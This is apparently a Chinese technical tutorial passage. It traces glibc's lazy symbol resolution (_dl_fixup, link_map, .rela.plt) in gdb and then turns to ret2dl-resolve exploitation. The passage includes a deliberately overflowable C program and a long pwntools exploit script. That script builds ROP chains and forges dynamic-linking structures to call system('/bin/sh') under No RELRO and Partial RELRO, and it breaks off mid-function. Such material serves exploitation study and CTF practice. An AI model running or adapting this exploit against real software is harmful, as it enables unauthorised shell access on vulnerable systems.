Version symbols section '.gnu.version' contains 6 entries:
 Addr: 0x00000000004004ee  Offset: 0x000004ee  Link: 6 (.dynsym)
  000:   0 (*local*)       2 (GLIBC_2.34)    1 (*global*)      3 (GLIBC_2.2.5)
  004:   1 (*global*)      1 (*global*)  
 
符号对应的版本信息:
Relocation section '.rela.plt' at offset 0x590 contains 1 entry:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
000000404000  000300000007 R_X86_64_JUMP_SLO 0000000000000000 puts@GLIBC_2.2.5 + 0

在此之后,会从l_info偏移0x320的位置取出l_versions成员(记录了所有的版本信息),借助刚刚找到的版本信息索引值(乘8是因为当前单位是字节,占8比特),可以将重定位符号对应的版本信息找出来。

最后如果发现版本信息中哈希值是控制,就会直接将清空整个版本信息。

1
2
3
4
(gdb) info registers r8
r8             0x7ffff7f9c5c8      140737353729480
(gdb) p *(struct r_found_version*)0x7ffff7f9c5c8
$36 = {name = 0x400492 "GLIBC_2.2.5", hash = 157882997, hidden = 0, filename = 0x400488 "libc.so.6"}

多线程处理

1
2
3
4
5
6
0x00007ffff7fd70b7 <+199>:   mov    %fs:0x18,%ecx
0x00007ffff7fd70bf <+207>:   mov    $0x1,%edx
0x00007ffff7fd70c4 <+212>:   test   %ecx,%ecx
0x00007ffff7fd70c6 <+214>:   je     0x7ffff7fd70d9 <_dl_fixup+233>
0x00007ffff7fd70c8 <+216>:   movl   $0x1,%fs:0x1c
0x00007ffff7fd70d4 <+228>:   mov    $0x5,%edx

设置完版本信息后,程序会从fs寄存器偏移0x18处取出数值给ecxfs是为了保存局部线程信息而存在的,其中偏移0x18对应着multiple_threads,显然这里使用判断程序是否是多线程,如果发现multiple_threads为0,就会跳转到0x233的位置,不针对多线程进行设置。反之,则会设置偏移0x1c处的gscope_flag成员,避免不同线程间发生冲突。

1
2
3
4
5
6
7
8
9
p *(tcbhead_t*)$fs_base
$39 = {tcb = 0x7ffff7da8740, dtv = 0x7ffff7da90e0, self = 0x7ffff7da8740, multiple_threads = 0, gscope_flag = 0, sysinfo = 0, stack_guard = 15852976144659649792,
  pointer_guard = 7034873935951137108, unused_vgetcpu_cache = {0, 0}, feature_1 = 0, __glibc_unused1 = 0, __private_tm = {0x0, 0x0, 0x0, 0x0},
  __private_ss = 0x0, ssp_base = 0, __glibc_unused2 = {{{i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}}, {{i = {0, 0, 0, 0}}, {
        i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}}, {{i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}}, {{i = {0,
          0, 0, 0}}, {i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}}, {{i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}, {i = {0, 0, 0,
          0}}}, {{i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}}, {{i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}, {
        i = {0, 0, 0, 0}}}, {{i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}, {i = {0, 0, 0, 0}}}}, __padding = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0}}

动态链接库基地址查找

确保多线程不会惹来麻烦的前提下,程序会开始通过_dl_lookup_symbol_x函数寻找符号,首先要做的是准备_dl_lookup_symbol_x函数需要的形参。

从汇编代码中可以看出函数接收8个参数,前6个通过寄存器传递,后2个通过栈空间传递,首先第一个参数rdi内存放的是之前通过.dynstr获得的重定位符号名,第二个参数rsi内存放是之前一直使用的link_map基地址,第三个参数rdx存储的是.dynsym节中的动态链接符号信息,第四个参数rcx是刚刚从link_map偏移0x3c8处取出的l_scope_mem成员,第五个参数r8是动态链接符号的版本信息,第六个参数r9存放1,第七个参数rsp+0x0存放的是1(它是前面根据多线程属性设置的数值),第八个参数rsp+0x8存放的是0。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
0x00007ffff7fd70d9 <+233>:   mov    0x3c8(%rbx),%rcx
0x00007ffff7fd70e0 <+240>:   mov    (%rax),%eax
0x00007ffff7fd70e2 <+242>:   push   $0x0
0x00007ffff7fd70e4 <+244>:   lea    -0x40(%rbp),%rsi
0x00007ffff7fd70e8 <+248>:   push   %rdx
0x00007ffff7fd70e9 <+249>:   mov    $0x1,%r9d
0x00007ffff7fd70ef <+255>:   mov    %rsi,%rdx
0x00007ffff7fd70f2 <+258>:   mov    %rbx,%rsi
0x00007ffff7fd70f5 <+261>:   add    %rax,%rdi
0x00007ffff7fd70f8 <+264>:   call   0x7ffff7fd0970 <_dl_lookup_symbol_x>
0x00007ffff7fd70fd <+269>:   mov    %rax,%r15
 
(gdb) info registers rdi rsi rdx rcx r8 r9
rdi            0x400471            4195441
rsi            0x7ffff7ffe2e0      140737354130144
rdx            0x7fffffffdb70      140737488345968
rcx            0x7ffff7ffe680      140737354131072
r8             0x7ffff7f9c5c8      140737353729480
r9             0x1                 1
(gdb) x /gx $rsp
0x7fffffffdb60: 0x0000000000000001
(gdb)
0x7fffffffdb68: 0x0000000000000000

_dl_lookup_symbol_x函数内部具体的操作暂时不从汇编代码的角度进行解析,这里暂时只需要知道它会根据符号名进行检索,返回对应动态链接库的基地址,并修改提供的动态链接符号信息。

1
2
3
4
5
6
(gdb) info registers rax
rax            0x7ffff7f9c000      140737353728000
(gdb) x /gx 0x7ffff7f9c000
0x7ffff7f9c000: 0x00007ffff7dab000
 
7ffff7dab000-7ffff7dcf000 r--p 00000000 08:01 7351314                    /usr/lib/libc.so.6

找到动态链接的基地址后,首先做的从TLS中取出gscope_flag,判断是否是多线程,如果是多线程就会跳转到0x424处,反之则会继续执行。

1
2
3
4
5
0x00007ffff7fd7100 <+272>:   mov    %fs:0x18,%eax
0x00007ffff7fd7108 <+280>:   pop    %r8
0x00007ffff7fd710a <+282>:   pop    %r9
0x00007ffff7fd710c <+284>:   test   %eax,%eax
0x00007ffff7fd710e <+286>:   jne    0x7ffff7fd7198 <_dl_fixup+424>

由于当前程序是单线程的,所以会继续前往0x292处执行。

动态链接符号地址获取

1
2
3
4
5
6
7
0x00007ffff7fd7114 <+292>:   mov    -0x40(%rbp),%rax
0x00007ffff7fd7118 <+296>:   test   %rax,%rax
0x00007ffff7fd711b <+299>:   je     0x7ffff7fd71e0 <_dl_fixup+496>
0x00007ffff7fd7121 <+305>:   cmpw   $0xfff1,0x6(%rax)
0x00007ffff7fd7126 <+310>:   je     0x7ffff7fd7208 <_dl_fixup+536>
0x00007ffff7fd712c <+316>:   test   %r15,%r15
0x00007ffff7fd712f <+319>:   je     0x7ffff7fd7208 <_dl_fixup+536>

当程序在0x292处继续执行时,会先从rbp-0x40处取出.dynsym节中的动态链接符号信息,然后判断它是否为空值,为空值就前往0x496处。

当程序继续正常运行时,会在偏移0x6的位置的st_shndx成员,并于SHN_ABS进行比较,如果相等就跳转到0x536的位置,SHN_ABS代表符号是绝对的。

接下来做的是判断_dl_lookup_symbol_x函数返回的动态链接库基地址(r15存储)是否为空,如果为空也会跳转到0x536的位置。

1
2
3
4
5
6
7
8
9
rbp-0x40存储0x7ffff7db1af0,下面通过Elf64_Sym进行解释:
(gdb) p *(Elf64_Sym*)0x7ffff7db1af0
$3 = {st_name = 27823, st_info = 34 '"', st_other = 0 '\000', st_shndx = 15,
  st_value = 527328, st_size = 518}
0x7ffff7dc2c98是libc.so.6中.dynstr节的地址:
(gdb) x /s 0x7ffff7dc2c98+27823
0x7ffff7dc9947: "puts"
 
#define SHN_ABS 0xfff1

上面做的判断主要是为了下面的操作,首先会将r15存储的libc.so.6基地址加上.dynsym节中puts符号信息的偏移值(这里偏移值已经被_dl_lookup_symbol_x函数修改),得到puts函数的最终地址,该最终地址会存储在rbp-0x38位置。

1
2
3
0x00007ffff7fd7135 <+325>:   mov    (%r15),%rdx
0x00007ffff7fd7138 <+328>:   add    0x8(%rax),%rdx
0x00007ffff7fd713c <+332>:   mov    %rdx,-0x38(%rbp)

在完成取到puts函数真实地址的任务后,程序会对符号信息中的st_info成员跟STT_GNU_IFUNC0xa进行判断,如果相等就跳转到0x648的位置。

1
2
3
4
5
6
#define STT_GNU_IFUNC   10
 
0x00007ffff7fd7140 <+336>:   movzbl 0x4(%rax),%eax
0x00007ffff7fd7144 <+340>:   and    $0xf,%eax
0x00007ffff7fd7147 <+343>:   cmp    $0xa,%al
0x00007ffff7fd7149 <+345>:   je     0x7ffff7fd7278 <_dl_fixup+648>

PLT中的跳转地址修改

接下来要判断的是偏移0x378的l_reloc_result成员,只有当模块提供la_symbind时才会生效,当然这是小概率情况(0x367-0x387的区域会暂时忽略),所以它会先跳转到0x520,到达0x520后,会先将puts函数地址放入rax内,然后再跳回0x391的位置。

1
2
3
4
5
6
7
8
9
0x00007ffff7fd714f <+351>:   mov    0x378(%rbx),%rax
0x00007ffff7fd7156 <+358>:   test   %rax,%rax
0x00007ffff7fd7159 <+361>:   je     0x7ffff7fd71f8 <_dl_fixup+520>
0x00007ffff7fd715f <+367>:   shl    $0x5,%r12
0x00007ffff7fd7163 <+371>:   add    %rax,%r12
0x00007ffff7fd7166 <+374>:   mov    0x1c(%r12),%eax
0x00007ffff7fd716b <+379>:   test   %eax,%eax
0x00007ffff7fd716d <+381>:   je     0x7ffff7fd7210 <_dl_fixup+544>
0x00007ffff7fd7173 <+387>:   mov    (%r12),%rax

此时解析函数进入最后阶段,首先会判断_dl_bind_not的数值,确定PLT是应该更新的,最后将rax中的puts函数地址返回,由于r14中存放的一直是PLT的地址,所以mov %rax,(%r14)操作就相当于修改PLT中的地址为puts函数的地址,使得下次调用时可以之间前往puts函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
p *(struct rtld_global_ro*)0x7ffff7ffca80
$19 = {_dl_debug_mask = 0, _dl_platform = 0x7fffffffe439 "x86_64", _dl_platformlen = 6, _dl_pagesize = 4096,
  ......
}
 
0x00007ffff7fd7177 <+391>:   mov    0x25953(%rip),%edx        # 0x7ffff7ffcad0 <_rtld_global_ro+80>
0x00007ffff7fd717d <+397>:   test   %edx,%edx
0x00007ffff7fd717f <+399>:   jne    0x7ffff7fd7184 <_dl_fixup+404>
0x00007ffff7fd7181 <+401>:   mov    %rax,(%r14)
0x00007ffff7fd7184 <+404>:   lea    -0x28(%rbp),%rsp
0x00007ffff7fd7188 <+408>:   pop    %rbx
0x00007ffff7fd7189 <+409>:   pop    %r12
0x00007ffff7fd718b <+411>:   pop    %r13
0x00007ffff7fd718d <+413>:   pop    %r14
0x00007ffff7fd718f <+415>:   pop    %r15
0x00007ffff7fd7191 <+417>:   pop    %rbp
0x00007ffff7fd7192 <+418>:   ret

忽略的部分

从0x419到0x689之间存在着上面各种判断异常然后跳转的地址,由于这部分是小概率的情况,所以在这里不会进行解析。

1
2
3
4
5
6
7
0x00007ffff7fd7193 <+419>:   nopl   0x0(%rax,%rax,1)
0x00007ffff7fd7198 <+424>:   xor    %eax,%eax
......
0x00007ffff7fd71f8 <+520>:   mov    -0x38(%rbp),%rax
0x00007ffff7fd71fc <+524>:   jmp    0x7ffff7fd7177 <_dl_fixup+391>
......
0x00007ffff7fd72a1 <+689>:   call   0x7ffff7fe1970 <__GI___assert_fail>

回到_dl_runtime_resolve_fxsave首先做的就是将puts函数地址交给r11,然后对之前占用的寄存器数值进行恢复,然后就是调用r11中的地址,实现puts函数的调用。

总结

首先_dl_runtime_resolve_fxsave函数是解析的第一步,它的作用是调用实际进行解析的_dl_fixup函数,并等待_dl_fixup函数返回,由于_dl_fixup函数返回的就是动态链接函数的地址,所以可以直接根据返回值进行调用,实现先解析后调用的操作。

负责解析的_dl_fixup函数依赖.dynamic节,.dynamic节内含有.dynsym节、.dynstr节以及.rela.plt节等动态链接所需的信息,因此只要包含一个.dynamic节就可以了,在link_map结构体中含有l_info成员,这个成员涵括.dynamic节中各个表项的地址。

不管是.dynsym节、.dynstr节还是.rela.plt节中的任意一个,它们都可以看作是一张表,里面可能具有非常多的表项,因此PLT阶段的push xxx会将索引值压入栈内,等待后续使用,该索引值是专门为PLT准备的,所以根据该索引值可用从.rela.plt节中检索到正确的表项,此时可以获取需要重定位的符号,由于.rela.plt节中的r_info高字节(右数4字节),存储着.dynsym节中符号的索引值,因此重定位符号的具体信息也有了,.dynsym节中的st_name成员存储的索引值可以从.dynstr节内检索到符号对应的字符串。

.dynsym节、.dynstr节以及.rela.plt节中的信息已经足够程序知道如何对符号进行重定位,但是符号的所在地还是未知的,只有在正确的动态链接库中找到符号才可以完成动态链接。在.dynamic节还保存着NEEDEDVERSYM信息,NEEDED指明了程序依赖的动态链接库,动态link_map结构体通过l_version成员专门保存这些信息,.gnu.version节提供了抓专门的索引值用于检索正确的动态链接库。

1
2
3
4
0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
.....
0x000000006ffffff0 (VERSYM)             0x4004ee
0x0000000000000000 (NULL)               0x0

此时进入收尾阶段,首先会准备参数交给_dl_lookup_symbol_x函数用于检索符号所在动态链接库的基地址,并修改动态链接符号信息,然后获取动态链接函数的地址并修改PLT,最后对函数进行调用。

静态链接文件与动态链接信息的关系

动态链接函数的解析流程概览 - 解析未知符号

动态链接函数的解析流程概览 - 解析已知知符号

利用思路

动态链接节可写

在延迟绑定的过程中,_dl_lookup_symbol_x函数的操作至关重要的,它查找符号的依据是.dynstr中的符号名,如果我们可以控制.dynstr节,那么就可以劫持_dl_runtime_resolve到我们期望的函数内部。

因为.dynstr节始终都是只读的,不能进行篡改,所以我们不得不将主意打到.dynamic节中,当程序是No RelRO属性时,.dynamic节就是可写可读的,如果我们修改.dynamic节中存储的.dynstr节地址,并且在新地址上构造假的.dynstr节,那么我们就可以完成劫持。

动态链接节不可写 - 基于已知的link_map地址

虽然.dynamic动态链接节变得不可写了,但是我们还有_dl_fixup函数接收的两个参数link_map lint reloc_arg可以控制,这两个变量较为特殊,动态链接函数的调用占用了全部的调用者寄存器,使得它们只能通过栈进行保存,这对于我们是十分有利的,因为不再需要通过pop指令向栈上传输数据了。

首先我们要寻找一块空闲的可写可读内存(.bss段的上方是十分合适的,这一点在栈迁移中进行过解释),在这段内存区域中,我们需要向其中填充构造的重定位信息(参考.rela.plt定义)、符号信息(参考.dynsym定义)、字符串信息。

_dl_fixup函数首先会通过reloc_arg检索重定位信息,基地址是.rela.plt的起始地址,因此reloc_arg等价于假重定位信息起始地址减去.rela.plt的起始地址再除以24(单个表项对应的Elf64_Rela的大小),重定位信息中的r_info可用于检索符号信息,符号信息中的st_name可用于检索字符串,参考reloc_arg就可以构造出这些偏移值。

此时_dl_fixup函数会通过“坏的”reloc_arg一步步的逼迫函数需要从我们构造的“坏”数据中检索重定位相关的信息(Elf64_RelaElf64_Sym结构体内的其他信息则需要按需填充)。

检索到我们构造的假信息后,_dl_fixup函数会对版本信息进行检查,这个检查是可有可无的,因此这里我们需要泄露link_map的地址,将link_map上记录版本信息的数值设置为空值。

最后我们就可以让_dl_lookup_symbol_x函数根据我们指定的信息检索符号了。

动态链接节不可写 - 基于已知符号地址并构造link_map

_dl_fixup函数一共只依赖两个参数,而且这两个参数都是我们可以控制的,那么我们把这两个参数全部都伪造了不就可以吗,不一定需要泄露地址啊!

理想是很丰满的,但现实是更残酷的,_dl_fixup函数的内部虽然只用link_map的一小部分,但是借助_dl_lookup_symbol_x函数检索符号时,也会用到link_map中不少的内容,link_map是一个非常庞大的结构体,想要把它完全伪造好并不是一个简单的事情。

上面解析_dl_fixup函数时,我们发现当函数发现符号未导出时,就会采用已知符号地址加上修正值l_addr对符号进行检索,这种方式有一种好处,就是不需要大量使用link_map中的信息,减少了我们伪造的难度。

1
2
3
4
5
6
7
#define LOOKUP_VALUE_ADDRESS(map, set) ((set) || (map) ? (map)->l_addr : 0)
#define SYMBOL_ADDRESS(map, ref, map_set)               \
  ((ref) == NULL ? 0                            \
   : (__glibc_unlikely ((ref)->st_shndx == SHN_ABS) ? 0          \
      : LOOKUP_VALUE_ADDRESS (map, map_set)) + (ref)->st_value)
 
value = DL_FIXUP_MAKE_VALUE (l, SYMBOL_ADDRESS (l, sym, true));

这时我们只需要构造link_map中的SYMTABSTRTABJMPRELl_addr几个部分。

示例讲解

由于代码比较简单,这里不会从反汇编的角度进行分析,下面直接给出了源代码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
 
#define MAX_LEN 0x100
 
static void vuln(void)
{
    char buf[100];
 
    setbuf(stdin, buf);
    read(STDIN_FILENO, buf, MAX_LEN);
}
 
int main(void)
{
    char msg[] = "hello world\n";
 
    write(STDOUT_FILENO, msg, strnlen(msg, MAX_LEN));
    vuln();
 
    return 0;
}

exploit构造

通过上面的分析我们可以构造出下方所示的exploit。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
import sys
import pwn
 
def usage():
    print('----------------------------------------------------')
    print('| python ./exploit.py [option]                     |')
    print('| options:                                         |')
    print('| n: bypass no relro                               |')
    print('| pn: bypass partial relro for normal lookup       |')
    print('| ps: bypass partial relro for specific lookup     |')
    print('----------------------------------------------------')
 
def arg_check(arg):
    print('[--] tips: arg = {0}'.format(arg))
    if arg != 'n' and arg != 'pn' and arg != 'ps':
        return -1
    return 0
 
def usage_error():
    print('[--] tips: incorrect usage')
    usage()
    exit()
 
def dynamic_ele_offset_get_by_tag(tag_name):
    dynamic_info = target_info['exec_info'].get_section_by_name('.dynamic')
    dynamic_addr = target_info['exec_info'].get_section_by_name('.dynamic').header.sh_addr
    dyn_ele_index = 0
    for t in dynamic_info.iter_tags():
        if t.entry.d_tag == tag_name:
            break
        dyn_ele_index = dyn_ele_index + 1
    dyn_ele_size = 0x10 # Elf64_Dyn size
    dynstr_in_dynamic  = dynamic_addr + dyn_ele_index * dyn_ele_size
    return dynstr_in_dynamic
 
'''
rop chain by csu [pop -> call -> pop -> ret]:
    csu_pop_ret (pop rbx, rbp, r12. r13. r14, r15)
    data for csu_pop_ret->pop
    address for csu_pop_ret->ret, address should be csu_call_reg
        csu_call_reg: rdi=r12 ; rsi=r13 ; rdx=r14 ; jump to [r15+8*rbx]
    after csu_call_reg, will do csu_pop_ret again (if rbx+1 != rbp ; jump to [csu_call_reg])
    data for csu_pop_ret->pop
    address for csu_pop_ret->ret
'''
 
def csu_rop_chain_get(
    r12_arg1, r13_arg2, r14_arg3, r15_call_addr_base,
    rbx_call_addr_append, rbp_val, ret_addr
):
    payload = pwn.p64(target_info['csu_pop_ret'])
    payload += pwn.p64(rbx_call_addr_append)
    payload += pwn.p64(rbp_val)
    payload += pwn.p64(r12_arg1)
    payload += pwn.p64(r13_arg2)
    payload += pwn.p64(r14_arg3)
    payload += pwn.p64(r15_call_addr_base)
    payload += pwn.p64(target_info['csu_call_reg'])
    payload += b'\x00' * target_info['addr_len']    # fix [add $0x8,%rsp]
    payload += b'\x00' * (target_info['csu_pop_all_count'] * target_info['addr_len'])
    payload += pwn.p64(ret_addr)
    return payload
 
'''
| buffer  | caller rbp | callee return |
| padding | padding    | csu_rop_chain |
'''
 
def rop_chain4dynstr_ptr_in_dynamic_modify_get():
    rbx_val = 0
    payload = b'A' * target_info['buf2ver']
    payload += b'B' * target_info['addr_len']
    payload += csu_rop_chain_get(
        target_info['stdin_fd'], dynamic_ele_offset_get_by_tag('DT_STRTAB') + target_info['addr_len'],
        target_info['addr_len'], target_info['exec_info'].got['read'],
        rbx_val, rbx_val + 1,
        target_info['exec_info'].symbols['vuln']    # read again
    )
    payload += b'\x00' * (target_info['setbuf_size'] - len(payload))
    return payload
 
def rop_chain4fake_dynstr_fill(data_len):
    rbx_val = 0
    payload = b'A' * target_info['buf2ver']
    payload += b'B' * target_info['addr_len']
    payload += csu_rop_chain_get(
        target_info['stdin_fd'], target_info['fake_addr'],
        data_len, target_info['exec_info'].got['read'],
        rbx_val, rbx_val + 1,
        target_info['exec_info'].symbols['vuln']    # read again
    )
    payload += b'\x00' * (target_info['setbuf_size'] - len(payload))
    return payload
 
def rop_chain4func_args_fill(func_args_addr, data_len):
    rbx_val = 0
    payload = b'A' * target_info['buf2ver']
    payload += b'B' * target_info['addr_len']
    payload += csu_rop_chain_get(
        target_info['stdin_fd'], func_args_addr,
        data_len, target_info['exec_info'].got['read'],
        rbx_val, rbx_val + 1,
        target_info['exec_info'].symbols['vuln']    # read again
    )
    payload += b'\x00' * (target_info['setbuf_size'] - len(payload))
    return payload
 
def rop_chain4dl_resollve_start(func_args_addr):
    payload = b'A' * target_info['buf2ver']
    payload += b'B' * target_info['addr_len']
    payload += pwn.p64(target_info['csu_pop_rsi_r15_ret'])
    payload += pwn.p64(0)
    payload += pwn.p64(0)
    payload += pwn.p64(target_info['csu_pop_rdi_ret'])
    payload += pwn.p64(func_args_addr)
    payload += pwn.p64(target_info['exec_info'].symbols['read'] + 0x6# add 0x6, goto the second instruction of read@plt
    payload += b'\x00' * (target_info['setbuf_size'] - len(payload))
    return payload
 
'''
stage one   -> modify the .dynstr address recorded in .dynamic to address [fake_addr]
stage two   -> create fake .dynstr and fill it into address [fake_addr]
stage three -> set the args required by the function to address [fake_addr + fake .dynstr len]
stage four  -> jump to read@plt [1], When _dl_resolve is running, [fake function] will be obtained instead of [read]
'''
 
def pwn4norelro():
    payload_1 = rop_chain4dynstr_ptr_in_dynamic_modify_get()
    conn.send(payload_1)
    data4payload_1 = pwn.p64(target_info['fake_addr'])
    conn.send(data4payload_1)
 
    dynstr_orig = target_info['exec_info'].get_section_by_name('.dynstr').data()
    fake_dynstr4payload_2 = dynstr_orig.replace(b'read', b'system')
    payload_2 = rop_chain4fake_dynstr_fill(len(fake_dynstr4payload_2))
    conn.send(payload_2)
    conn.send(fake_dynstr4payload_2)
 
    func_args_addr = target_info['fake_addr'] + len(fake_dynstr4payload_2)
    args4payload_3 = b'/bin/sh\x00'
    payload_3 = rop_chain4func_args_fill(func_args_addr, len(args4payload_3))
    conn.send(payload_3)
    conn.send(args4payload_3)
 
    payload_4 = rop_chain4dl_resollve_start(func_args_addr)
    conn.send(payload_4)
 
def fake_rela_plt_get(pre_data_len, sym_index4fake_dynsym):
    real_rela_plt_addr = target_info['exec_info'].get_section_by_name('.rela.plt').header.sh_addr
    one_rela_size = target_info['exec_info'].dynamic_value_by_tag('DT_RELAENT')
    reslove_addr = target_info['exec_info'].got['write']
    ELF_MACHINE_JMP_SLOT_val = 0x7
 
    fake_rela_plt_addr = target_info['fake_addr'] + pre_data_len
    fake2real_offset = fake_rela_plt_addr - real_rela_plt_addr
    pad = one_rela_size - fake2real_offset % one_rela_size
    fake_rela_plt_addr = fake_rela_plt_addr + pad
    fake2real_offset = fake_rela_plt_addr - real_rela_plt_addr
    rela_index4fake_rela_plt = fake2real_offset / one_rela_size
 
    fake_data = b'\x00' * pad
    fake_data += pwn.p64(reslove_addr)                                              # r_offset
    fake_data += pwn.p64((sym_index4fake_dynsym << 32) | ELF_MACHINE_JMP_SLOT_val)    # r_info
    fake_data += pwn.p64(0)                                                         # r_addend
    return fake_data, int(rela_index4fake_rela_plt)
 
def fake_dynsym_get(pre_data_len, str_index4fake_dynstr):
    real_dynsym_addr = target_info['exec_info'].get_section_by_name('.dynsym').header.sh_addr
    one_symtab_size = target_info['exec_info'].dynamic_value_by_tag('DT_SYMENT')
 
    fake_dynsym_addr = target_info['fake_addr'] + pre_data_len
    fake2real_offset = fake_dynsym_addr - real_dynsym_addr
    pad = one_symtab_size - fake2real_offset % one_symtab_size
    fake_dynsym_addr = fake_dynsym_addr + pad
    fake2real_offset = fake_dynsym_addr - real_dynsym_addr
    sym_index4fake_dynsym = fake2real_offset / one_symtab_size
 
    fake_data = b'\x00' * pad
    fake_data += pwn.p32(str_index4fake_dynstr)     # st_name
    fake_data += pwn.p8(0x18)                       # st_info, st_info -> bind, type, 0x18 -> STB_GLOBAL, STT_FUNC
    fake_data += pwn.p8(0)                          # st_other
    fake_data += pwn.p16(0)                         # st_shndx
    fake_data += pwn.p64(0)                         # st_value
    fake_data += pwn.p64(0)                         # st_size
    return fake_data, int(sym_index4fake_dynsym)
 
def fake_dynstr_get():
    real_dynstr_addr = target_info['exec_info'].get_section_by_name('.dynstr').header.sh_addr
    one_symtab_size = target_info['exec_info'].dynamic_value_by_tag('DT_SYMENT')
 
    str_index4fake_dynstr = target_info['fake_addr'] - real_dynstr_addr
 
    fake_data = b'system'
    fake_data += b'\x00'
    return fake_data, int(str_index4fake_dynstr)
 
'''
| fake .dynstr | fake .dynsym | fake .rela.plt | fake function args |
 
relocation index -> fake .rela.plt -> r_info -> symbol index
symbol index -> fake .dynsym -> st_name -> string index
string index -> fake .dynstr
 
string -> .dynstr base address + string index
symbol -> .dynsym base address + (symbol index * one symtab size)
rela   -> .rela.plt base address + (rela index * one rela size)
 
| buffer  | caller rbp | callee return |
| padding | padding    | rop chain     |
 
rop chain -> read fake data to fake address
'''
 
def rop_chain4fake_dl_resolve_data_fill():
    fake_dynstr_data, str_index4fake_dynstr = fake_dynstr_get()
    fake_data = fake_dynstr_data
 
    fake_dynsym_data, sym_index4fake_dynsym = fake_dynsym_get(len(fake_dynstr_data), str_index4fake_dynstr)
    fake_data += fake_dynsym_data
 
    fake_rela_plt, rela_index4fake_rela_plt = fake_rela_plt_get(len(fake_data), sym_index4fake_dynsym)
    fake_data += fake_rela_plt
 
    bin_sh_addr = target_info['fake_addr'] + len(fake_data)
    fake_data += b'/bin/sh\x00'
 
    rbx_val = 0
    payload = b'A' * target_info['buf2ver']
    payload += b'B' * target_info['addr_len']
    payload += csu_rop_chain_get(
        target_info['stdin_fd'], target_info['fake_addr'],
        len(fake_data), target_info['exec_info'].got['read'],
        rbx_val, rbx_val + 1,
        target_info['exec_info'].symbols['vuln']    # read again
    )
    payload += b'\x00' * (target_info['setbuf_size'] - len(payload))
    return payload, fake_data, bin_sh_addr, rela_index4fake_rela_plt
 
def rop_chain4link_map_addr_leak():
    rbx_val = 0
    payload = b'A' * target_info['buf2ver']
    payload += b'B' * target_info['addr_len']
    payload += csu_rop_chain_get(
        target_info['stdout_fd'], target_info['push_link_map_site'],
        target_info['addr_len'], target_info['exec_info'].got['write'],
        rbx_val, rbx_val + 1,
        target_info['exec_info'].symbols['vuln']    # read again
    )
    payload += b'\x00' * (target_info['setbuf_size'] - len(payload))
    return payload
 
def rop_chain4verson4l_info_set2null(link_map_addr):
    rbx_val = 0
    payload = b'A' * target_info['buf2ver']
    payload += b'B' * target_info['addr_len']
    payload += csu_rop_chain_get(
        target_info['stdin_fd'], link_map_addr + 0x1c8,
        target_info['addr_len'], target_info['exec_info'].got['read'],
        rbx_val, rbx_val + 1,
        target_info['exec_info'].symbols['vuln']    # read again
    )
    payload += b'\x00' * (target_info['setbuf_size'] - len(payload))
    return payload
 
'''
| rsp + 0x0      | rsp + 0x8 | rsp + 0x10      |
| func_args_addr | plt0_addr | fake rela index |
 
pop rdi -> rdi = func_args_addr
ret     -> rip = plt0
    rsp+0x0 -> fake rela index
 
plt0 push xxxx
    rsp+0x0 -> link_map
    rsp+0x8 -> fake rela index
 
_dl_fixup (struct link_map *l, ElfW(Word) reloc_arg)
l = rsp+0x0 ; reloc_arg = rsp+0x8
'''
 
def rop_chain4dl_resolve_with_normal_lookup_start(func_args_addr, rela_index4fake_rela_plt):
